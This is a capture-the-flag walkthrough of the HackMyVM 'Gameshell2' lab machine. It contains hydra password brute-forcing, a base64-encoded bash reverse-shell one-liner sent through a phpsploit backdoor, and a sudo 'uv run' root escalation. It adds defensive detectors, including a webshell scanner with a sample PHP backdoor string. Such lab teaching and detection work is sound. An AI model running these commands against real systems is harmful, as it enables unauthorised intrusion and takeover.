Box Info
  • Name: Gameshell2
  • OS: Linux
  • Difficulty: Easy
  • IP: 10.0.0.27

Setup

mkdir -p ~/ctf/HackMyVM/Gameshell2/scans && cd ~/ctf/HackMyVM/Gameshell2

IP Address: 10.0.0.27

Add to /etc/hosts (requires sudo): echo "10.0.0.27 gameshell2.hmv" | sudo tee -a /etc/hosts

10.0.0.27 gameshell2.hmv


Enumeration

Nmap (full TCP, safe defaults): nmap -sC -sV -Pn -p- gameshell2.hmv -oN ~/ctf/HackMyVM/Gameshell2/scans/nmap_20260109-210416.txt -vv

Fast sweep variant: nmap -sC -sV -p- -T4 --min-rate 2000 -vv gameshell2.hmv -oN ~/ctf/HackMyVM/Gameshell2/scans/nmap_fast_20260109-210416.txt

# nmap findings
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
|   256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
79/tcp open  finger  syn-ack ttl 64 OpenBSD fingerd (ported to Linux)
| finger: \x0D
| Welcome to Linux version 4.19.0-27-amd64 at GameShell2 !\x0D
| 
|  11:27:38 up 18 min,  0 users,  load average: 1.35, 4.33, 2.64
| \x0D
|_No one logged on.\x0D
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/ternimal/
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
MAC Address: 08:00:27:48:E7:B8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: GameShell2; OSs: Linux, Linux 4.19.0-27-amd64; CPE: cpe:/o:linux:linux_kernel, cpe:/o:linux:linux_kernel:4.19.0-27-amd64

Besides SSH, the scan shows 79/tcp (finger) and 80/tcp (HTTP). Opening the HTTP port in a browser shows a billiards game.

We use directory fuzzing to find directories that might be exposed on this web server.

Gobuster (common web dirs): gobuster dir --no-error -e -x php,html,txt -u http://gameshell2.hmv -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -o ~/ctf/HackMyVM/Gameshell2/scans/gobuster_20260109-210416.txt


# gobuster findings

===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://gameshell2.hmv
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php,html,txt
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html                     (Status: 200) [Size: 14134]
/users.html                    (Status: 200) [Size: 2052]
/robots.txt                     (Status: 200) [Size: 35]
/terminal                      (Status: 401) [Size: 461]
/server-status                  (Status: 403) [Size: 279]
Progress: 882228 / 882228 (100.00%)
===============================================================
Finished
===============================================================

FFUF directory search: ffuf -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:ff -u http://gameshell2.hmv/ff -o ~/ctf/HackMyVM/Gameshell2/scans/ffuf_dir_20260109-210416.json

# FFUF dir search findings

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://gameshell2.hmv/ff
 :: Wordlist         : ff: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 :: Follow redirects : true
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
terminal                [Status: 401, Size: 461, Words: 42, Lines: 15, Duration: 1ms]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 1ms]

We see robots.txt and users.html, when we open

Two ready-made tools brute-force the finger service to find valid users: Finger-User-Enumeration and the Metasploit module auxiliary/scanner/finger/finger_users.

But that did not work for some odd reason, so I had to make a custom bash script that takes each line, runs it through the finger command, and outputs only the results that did not contain “no such user”, “unknown user” or “connect: Connection refused”.

#!/bin/bash
# Query the finger service for every name in users.txt and print only the
# responses that do not look like an unknown user or a refused connection.

HOST="10.0.0.27"
USERS_FILE="users.txt"

while IFS= read -r user; do
    [ -z "$user" ] && continue   # skip blank lines in the wordlist
    output=$(finger "$user@$HOST" 2>&1)

    # Filter out invalid users
    if ! echo "$output" | grep -qiE "no such user|unknown user|connect: Connection refused"; then
        echo "----- $user -----"
        echo "$output"
        echo
    fi
done < "$USERS_FILE"

From this we know the machine has the users lp, dt and root (root was confirmed by manual testing). lp appears to be the Linux system account for the print spooler service.

Let's try the /terminal login (it answered 401, so it is protected by HTTP authentication) as user dt with rockyou.txt; hydra can do this.

hydra -l dt -P /usr/share/wordlists/rockyou.txt http-get://10.0.0.27/terminal

We get a valid credential: dt:purple1
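From the defender's side, the hydra run above leaves a very loud trace: a burst of 401 responses for /terminal from one client in the Apache access log. The following script is an added example (not part of the original writeup) that parses combined-format access-log lines and flags any client that produces a threshold number of 401s under a path prefix inside a sliding time window. The log lines, the client IPs and the threshold values are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" log format; the fields we need are client IP, timestamp, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforce(lines, path_prefix="/terminal", threshold=10, window=timedelta(minutes=1)):
    """Return {client_ip: total_401s} for every client that produced at least
    `threshold` 401 responses under `path_prefix` within any `window`-long span."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 401 and rec["path"].startswith(path_prefix):
            failures[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, stamps in failures.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):  # sliding window over the sorted timestamps
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


# Constructed sample log (not captured from the box): one client hammering /terminal,
# one client with a single failure, and one successful request.
def _line(ip, second, status, user="dt"):
    return (f'{ip} - {user} [09/Jan/2026:21:04:{second:02d} +0000] '
            f'"GET /terminal/ HTTP/1.1" {status} 461 "-" "Mozilla/5.0"')


SAMPLE_LOG = [_line("10.0.0.18", s, 401) for s in range(12)] + [
    _line("10.0.0.50", 5, 401),
    _line("10.0.0.18", 13, 200),
]

if __name__ == "__main__":
    for ip, n in find_bruteforce(SAMPLE_LOG).items():
        print(f"possible brute force from {ip}: {n} failed auth attempts on /terminal")
```

On a real host you would feed it the lines of /var/log/apache2/access.log and pair the alert with a rate limit or a ban (fail2ban's apache-auth jail does essentially this). A password such as purple1 falls in seconds to a wordlist, so the detection is a second line behind a strong password policy, not a replacement for one.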

Logging in to gameshell2.hmv/terminal, we find a shell-based snake game. The objective is to reach a score of 15 (which took a lot of concentration T _ T).

After scoring 15 we get a password: 0t4tdtlt. Let's try SSH as the dt user with this password:

  • I might come back and update this writeup to take a look at this game to break it in another way.

User Flag

Location: /home/dt/user.txt

Privilege Escalation

Enumerating the file system as user dt, I checked /etc/hosts and discovered an internal domain: 127.0.1.1 dev.astra.dsz. To interact with this, I added dev.astra.dsz to my attacker machine’s /etc/hosts file pointing to the box IP:

gobuster dir --no-error -e -x php,html,txt -u http://dev.astra.dsz -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

This fuzzing finds several endpoints; the interesting one is backdoor.php. I try the usual id cmd endpoints in many ways.

Inside dt’s home directory, I found a folder named phpsploit. This is a specific C2 framework. Finding this tool here strongly suggests that backdoor.php (found via Gobuster) is a backdoor generated by this specific framework. This gives us the exact tool needed to interact with it.

Let's try running it.

It requires installing its Python requirements first.

So, setting the target to http://dev.astra.dsz/backdoor.php, we get a reverse shell as www-data. We also learn that phpsploit delivers its commands in the HTTP_PHPSPL01T request header, which the backdoor executes.

Using echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjAuMC4xOC82NjY2IDA+JjE=" | base64 -d | bash, we send our payload and obtain a reverse shell.
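The detail worth keeping from this step is how a header-driven backdoor looks in source: a PHP file that hands the contents of a request superglobal (here a custom HTTP_ header) straight to eval. That shape is easy to hunt for in a web root. The script below is an added example, not part of the writeup or of phpsploit, that scans .php files for execution functions fed from request data, for execution of a decoded blob, and (informationally) for reads of custom request headers. The sample PHP snippets are constructed to show the three cases; the signature list is a starting point, not a complete webshell ruleset.

```python
import re
from pathlib import Path

# Functions that execute code or commands, and the request superglobals an attacker controls.
EXEC_FUNCS = r"(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)"
REQUEST_SRC = r"\$_(?:SERVER|GET|POST|REQUEST|COOKIE)\s*\["

SIGNATURES = [
    # eval($_SERVER[...]), system($_GET[...]) and similar: request data straight into execution
    ("exec-from-request", re.compile(rf"@?\b{EXEC_FUNCS}\s*\(\s*{REQUEST_SRC}", re.I)),
    # execution of a decoded blob, a common obfuscation layer over the same idea
    ("decode-then-exec", re.compile(rf"\b{EXEC_FUNCS}\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I)),
    # any read of a request header; informational on its own, since many apps read User-Agent etc.
    ("reads-request-header", re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_[A-Z0-9_]+['\"]\s*\]", re.I)),
]
HIGH_CONFIDENCE = {"exec-from-request", "decode-then-exec"}


def scan_source(src):
    """Return the sorted list of signature names that match the given PHP source text."""
    return sorted(name for name, rx in SIGNATURES if rx.search(src))


def is_backdoor(src):
    """True when at least one high-confidence execution signature matches."""
    return bool(HIGH_CONFIDENCE & set(scan_source(src)))


def scan_tree(root):
    """Walk a web root and return {path: findings} for every .php file with any match."""
    hits = {}
    for p in Path(root).rglob("*.php"):
        try:
            src = p.read_text(errors="replace")
        except OSError:
            continue
        findings = scan_source(src)
        if findings:
            hits[str(p)] = findings
    return hits


# Constructed samples (not the box's files): the header-driven shape described above,
# an obfuscated variant, and a benign header read that must not be flagged as a backdoor.
HEADER_BACKDOOR = "<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>"
OBFUSCATED = "<?php eval(base64_decode($_POST['cmd'])); ?>"
BENIGN = "<?php $ua = $_SERVER['HTTP_USER_AGENT']; echo htmlspecialchars($ua); ?>"

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/var/www/html"
    for path, findings in scan_tree(root).items():
        level = "HIGH" if HIGH_CONFIDENCE & set(findings) else "info"
        print(f"[{level}] {path}: {', '.join(findings)}")
```

Run it as `python3 scan_webroot.py /var/www/html` (the script name is arbitrary). Beyond signature scanning, a phpsploit-style backdoor also stands out operationally: a PHP file nobody deployed, and requests that carry an unusual custom header to a single script, both of which are worth alerting on at the reverse proxy or WAF.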

The user www-data is allowed to run the /usr/bin/uv binary as root without a password. Checking the help page for uv confirms it has a run command which can execute arbitrary scripts or binaries.

Using sudo uv run '/bin/bash' we get a root shell and we are in!
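The root cause here is a sudoers rule, not a bug in uv: a NOPASSWD entry for a binary whose normal job is to run other programs is equivalent to granting a root shell. The following is an added example (not from the writeup) of a small sudoers auditor that parses user specifications and flags NOPASSWD rules on ALL or on such launcher binaries. The watchlist of launchers and the sudoers excerpt are constructed assumptions modelled on the misconfiguration found on this box; aliases and Defaults lines are skipped rather than expanded.

```python
import re

# Constructed watchlist (an assumption, not from the writeup): binaries whose ordinary
# subcommands execute arbitrary programs, so passwordless root access to them is a root shell.
LAUNCHERS = {
    "/usr/bin/uv", "/usr/bin/python3", "/usr/bin/pip", "/usr/bin/npm",
    "/usr/bin/env", "/usr/bin/vim", "/bin/bash", "/bin/sh", "/usr/bin/find",
}

# user  host = (runas) TAG: cmd, cmd ...   (alias definitions and Defaults lines are skipped)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_sudoers(text):
    """Return a list of (user, runas, tags, [command strings]) for each user specification."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and surrounding whitespace
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        rules.append((m["who"], m["runas"] or "root", tags, cmds))
    return rules


def audit(text):
    """Return (user, command, reason) for every NOPASSWD rule that hands out arbitrary execution."""
    findings = []
    for who, runas, tags, cmds in parse_sudoers(text):
        if "NOPASSWD" not in tags:
            continue
        for cmd in cmds:
            binary = cmd.split()[0]
            if cmd == "ALL":
                findings.append((who, cmd, "NOPASSWD with ALL: unrestricted root"))
            elif binary in LAUNCHERS:
                findings.append((who, cmd, f"NOPASSWD on {binary}, which runs arbitrary programs"))
    return findings


# Constructed /etc/sudoers excerpt (not the box's real file), including the rule found on this box.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
# the rule that gives www-data root on this box
www-data ALL=(root) NOPASSWD: /usr/bin/uv
dt       ALL=(ALL) /usr/bin/apt update
backup   ALL=(root) NOPASSWD: /usr/bin/rsync -a /var/www/ /backup/
guest    ALL=(ALL) NOPASSWD: ALL
"""

if __name__ == "__main__":
    for who, cmd, reason in audit(SAMPLE_SUDOERS):
        print(f"{who}: {cmd} -> {reason}")
```

The fix is to delete the rule: there is no argument restriction that makes `uv run` safe, because its purpose is to execute whatever it is pointed at. If www-data genuinely needs a privileged action, wrap that single action in a fixed script owned by root, grant sudo on that script with no arguments, and keep the web server account out of any rule that names an interpreter or package manager.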


Root Flag

Location: /root